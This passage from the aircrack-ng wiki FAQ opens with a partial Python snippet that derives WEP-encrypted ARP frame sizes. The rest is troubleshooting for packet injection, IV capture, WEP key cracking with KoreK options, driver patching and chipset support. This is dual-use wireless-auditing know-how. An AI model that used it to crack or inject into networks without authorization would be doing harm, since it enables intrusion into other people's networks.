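WEP_ICV = 4           # CRC-32 integrity check value appended to the encrypted body


def eth_frame_len(payload_len: int, padded: bool) -> int:
    """Ethernet frame length (no FCS). A wired NIC pads to 60 bytes; an AP that bridges
    a wireless client's frame does not, which is why airdecap-ng/tcpdump show 42."""
    length = ETH_HDR + payload_len
    return max(length, ETH_MIN_FRAME) if padded else length


def wep_frame_len(payload_len: int) -> int:
    """802.11 WEP data frame length for a given LLC payload (the ARP plus any padding).
    The WEP overhead is the same for 64-bit and 128-bit keys: the IV header is always 4 bytes."""
    return DOT11_DATA_HDR + WEP_IV_HDR + LLC_SNAP + payload_len + WEP_ICV


def bridged_wep_frame_len(eth_len: int) -> int:
    """Length after an AP bridges an Ethernet frame onto WEP 802.11: the 14-byte Ethernet
    header is replaced by 802.11 + WEP framing, but Ethernet padding is carried along."""
    return wep_frame_len(eth_len - ETH_HDR)


def arp_sizes() -> dict:
    """The four sizes the FAQ quotes, derived rather than stated."""
    wired_arp_eth = eth_frame_len(ARP_LEN, padded=True)       # 60 on the wire
    wireless_arp_eth = eth_frame_len(ARP_LEN, padded=False)   # 42 after decryption
    return {
        "wired_client_on_ethernet": wired_arp_eth,
        "wired_client_relayed_by_ap": bridged_wep_frame_len(wired_arp_eth),   # 86
        "wireless_client_on_air": wep_frame_len(ARP_LEN),                      # 68
        "wireless_client_decrypted_to_ethernet": wireless_arp_eth,            # 42
    }


def looks_like_wep_arp(frame_len: int) -> bool:
    """Size test behind the -m/-n length filters: a WEP data frame of exactly 68 or
    86 bytes is very likely an ARP request or reply. A minimal IP datagram (20-byte
    header + 8 bytes) has the same 28-byte payload, so size alone is a strong hint,
    not proof; the ARP reply that follows is the usual confirmation."""
    return frame_len in (wep_frame_len(ARP_LEN), bridged_wep_frame_len(ETH_MIN_FRAME))
```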

How can I resolve MAC addresses to IP addresses ?


You can try netdiscover or ARP tools.

What are the allowed rates ?


Modulation     Allowed rates
DSSS / CCK     1M, 2M, 5.5M, 11M
OFDM (a/g)     6M, 9M, 12M, 24M, 36M, 48M, 54M

How do I recover my WEP/WPA key in windows ?


You have to use WZCook.

How can I force loading of the orinoco driver instead of Hostap or force Hostap/wlan-ng instead of orinoco ?
You have to edit the pcmcia-cs configs. See /etc/pcmcia/config and related files in that directory. Example (force HostAP instead of orinoco):

1. Edit /etc/pcmcia/config.
2. Add a new device if it doesn't already exist:

device "hostap_cs"
  class "network" module "hostap_cs"

3. Find your card's name. In my case a DWL-650. If you don't find it, find a card that has the same pciid as yours (you can also add an entry in config.opts if you want to do it cleanly).
4. In bind, replace orinoco_cs by hostap_cs.
5. Save changes and close the file.
6. Unplug all pcmcia cards using cardctl eject.
7. Restart the pcmcia service:

/etc/init.d/pcmcia restart

8. Replug your card, and voilà.

Why do I have wlan0 and wifi0 when hostAP is loaded?


From the hostAP readme: Unlike most Linux network drivers, the Host AP driver creates multiple network devices. wifi0 (or wifi# if you have multiple cards) is the master interface for the radio device. It uses IEEE 802.11 headers and is used internally by the driver to process frames to and from other interfaces. wlan0 is the default data interface. It is the interface that is used in most configurations, e.g., it is configured with an IP address and iwconfig commands can be used with it. When using WDS, each link will create a new virtual device (wlan0wds0).

Aireplay-ng doesn't inject packets


Possible reasons:

Your card cannot inject packets (see Install drivers).
Bad driver (try reinstalling them; BTW, upgrade them to the latest version).
Driver not patched (also see Install drivers). Pay attention: drivers shipped with your distro are NOT patched.
You're too far away; the access point or the client cannot get your packets.
Signal is too weak (don't forget that WiFi uses radio waves).
The client or the access point is protected.

What is the frequency for each channel?


To determine the frequency that a channel uses (or vice versa), check out http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels, then select the "Wifi Channel Selection and Channel Overlap" tab.

How do I convert the HEX characters to ASCII?


Here are some conversion links. Remember to put % in front of each hex character when going from hex to ASCII.

http://centricle.com/tools/ascii-hex/
http://www.mikezilla.com/exp0012.html
http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html

How do I learn more about WPA/WPA2?


See the links page.

Does the aircrack-ng suite support Airpcap adaptor?


See airpcap.

I can't seem to capture any IVs !


As a reminder, it doesn't work at all with ndiswrapper. Possible reasons:

You are standing too far from the access point.
There is no traffic on the target wireless network.
There is some G traffic but you're capturing in B mode.
Something is wrong with your card (firmware problem?).

By the way, beacons are just unencrypted announcement packets. They're totally useless for WEP cracking.

I can't inject packets


As a reminder, you can't inject with a Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell or Broadcom chipset because of firmware and/or driver limitations. Note: You can't inject with OpenWrt devices (this news is an April fool, see the post date). If your chipset supports injection, you can try the following:

Be closer (but not too close; it will be explained later) to the Access Point.
Decrease the speed for injection and/or the bitrate with which your card is operating (iwconfig <interface> rate 1M).
Your driver may not be patched or not up to date. You should always take the latest CVS/SVN revision if it exists (see Drivers).
See also the previous question.

I have more than one million IVs, but aircrack-ng doesn't find the key !
Possible reasons:

Out of luck: you must capture more IVs. Usually, 104-bit WEP can be cracked with about one million IVs, but sometimes more IVs are needed.
If all votes seem equal, or if there are many negative votes, then the capture file is corrupted, or the key is not static (EAP/802.1X in use?).
A false positive prevented the key from being found. Try disabling each KoreK attack (-k 1 .. 17), raising the fudge factor (-f) or trying the experimental bruteforce attacks (-x / -y).

I've been unable to crack this AP !


Well, it happens. The last thing you can try is asking the network owner for the key ;)

I have a Prism2 card, but airodump-ng / aireplay-ng doesn't seem to work !


First step, make sure you aren't using the orinoco driver. If the interface name is wlan0, then the driver is HostAP or wlan-ng. However, if the interface name is eth0 or eth1, then the driver is orinoco and you must disable that driver (use cardctl ident to find your card identifier, then edit /etc/pcmcia/config, replace orinoco_cs with hostap_cs and restart cardmgr).

Also, it can be a firmware problem. Old firmware versions have trouble with test mode 0x0A (used by the HostAP / wlan-ng injection patches), so make sure yours is up to date (see Prism2 flashing for instructions). The recommended station firmware version is 1.7.4. If it doesn't work well (kismet or airodump-ng stalls after capturing a couple of packets), try STA 1.5.6 instead (either s1010506.hex for old Prism2 cards, or sf010506.hex for newer ones). On a side note, test mode 0x0A is somewhat unstable with wlan-ng. If the card seems stuck, you will have to reset it, or use HostAP instead. Injection is currently broken on Prism2 USB devices with wlan-ng.

I have an Atheros card, and the madwifi patch crashes the kernel / aireplay-ng keeps saying enhanced RTC support isn't available
There are quite a few problems with some versions of the Linux 2.6 branch (especially before 2.6.11 was released) that will cause a kernel panic when injecting with madwifi. Also, on many 2.6 kernels enhanced RTC support is just broken. Thus, it is highly recommended to use either Linux 2.6.11.x or newer.

Airodump-ng freezes when I change the injection rate, what can I do ?


You have two workarounds:

Change the rate before using airodump-ng
Restart airodump-ng

The PEEK driver does not recognize my card


Some cards are not recognized by the Windows drivers above, even though they have the correct chipset. In this case, open the hardware manager, select your card, choose "Update the driver", select "Install from a specific location", select "Don't search, I will choose the driver to install", click "Have disk", set the path to where the driver has been unzipped, uncheck "Show compatible hardware", and finally choose the driver.

Why do I get Error: packet length < 30 bytes ?


It was due to the use of madwifi-ng with aircrack and aircrack-ng up to 0.2.1.

Why do I have bad speeds when i'm too close to the access point?
Problem: The wireless card behaves badly if the signal is too strong. If I'm too close (1-2m) to the access point, I get a high quality signal but actual transmission rates drop (down to 5-11Mbps or less). The net result is TCP throughput of about 600KB/s. This is called antenna and receiver saturation. The signal coming in to the preamplifier is too strong and clips the input of the amplifier, causing signal degradation. This is a normal phenomenon with most 802.11 hardware.

Is it a driver problem or is it my network hardware?


Neither, really. It's a physics problem. The only solution is to either decrease transmission power, use an antenna with a lower gain factor, or move the access point farther away from the station. You should use wired ethernet when you're close to the access point. If you don't want or don't have a wire, you can also decrease the output power of your access point or your card.

How do I download and compile aircrack-ng?


See the downloads page.

The driver won't compile


This usually happens because the Linux headers don't match your currently running kernel. In this situation, grab the kernel sources or just recompile a fresh kernel, install it and reboot. Then try compiling the driver again. See this HOWTO for more details about kernel compilation.

Why can't I compile airodump-ng and aireplay-ng on BSD / Mac OS X / other OS?


Both airodump-ng and aireplay-ng sources are Linux-specific.

Why do I get "ioctl(SIOCGIFINDEX) failed: No such device"?


Double check that your device name is correct and that you haven't forgotten a parameter on the command line. When using the linux-wlan-ng driver, be sure to enable the interface first with airmon-ng.

Why do I get lots of random BSSIDs when I use aircrack-ng on a .ivs file?
If the .ivs file was generated using pcap2ivs from aircrack (any version) or aircrack-ng (up to 0.2.1), it is corrupted by a bug in those versions. You should upgrade to aircrack-ng 0.3 or later. You can try to recover part of the information using FixIvs.

Why does aircrack-ng stall while reading a .ivs file and never start cracking?
Your .ivs file may have been corrupted if you used pcap2ivs. Read the previous point.

Why does airodump-ng stop capturing packets after a few seconds?


wpa_supplicant or a network manager may be running and trying to connect to an access point. You should stop it before running airodump-ng.

Why does my computer lock up when injecting packets? Is there a solution?


See http://tinyshell.be/aircrackng/forum/index.php?topic=901.0

Is VMware supported?
At this point, there is only sketchy, unconfirmed information about the aircrack-ng suite running under VMware. One known limitation: you can't use PCMCIA cards with Fedora (and maybe other distros) running inside VMware (at least as of the last time the forums at remoteexploit were reviewed). You should be able to make use of internal cards and some USB wireless cards, but you are limited in your antenna choices at that point. Some people modify their USB cards to allow for an external antenna. If anyone has hands-on experience, please post on the forum so the information may be shared with everyone.

What other tips do you have?


Various tips

faq.txt Last modified: 2007/02/16 01:08 by darkaudax
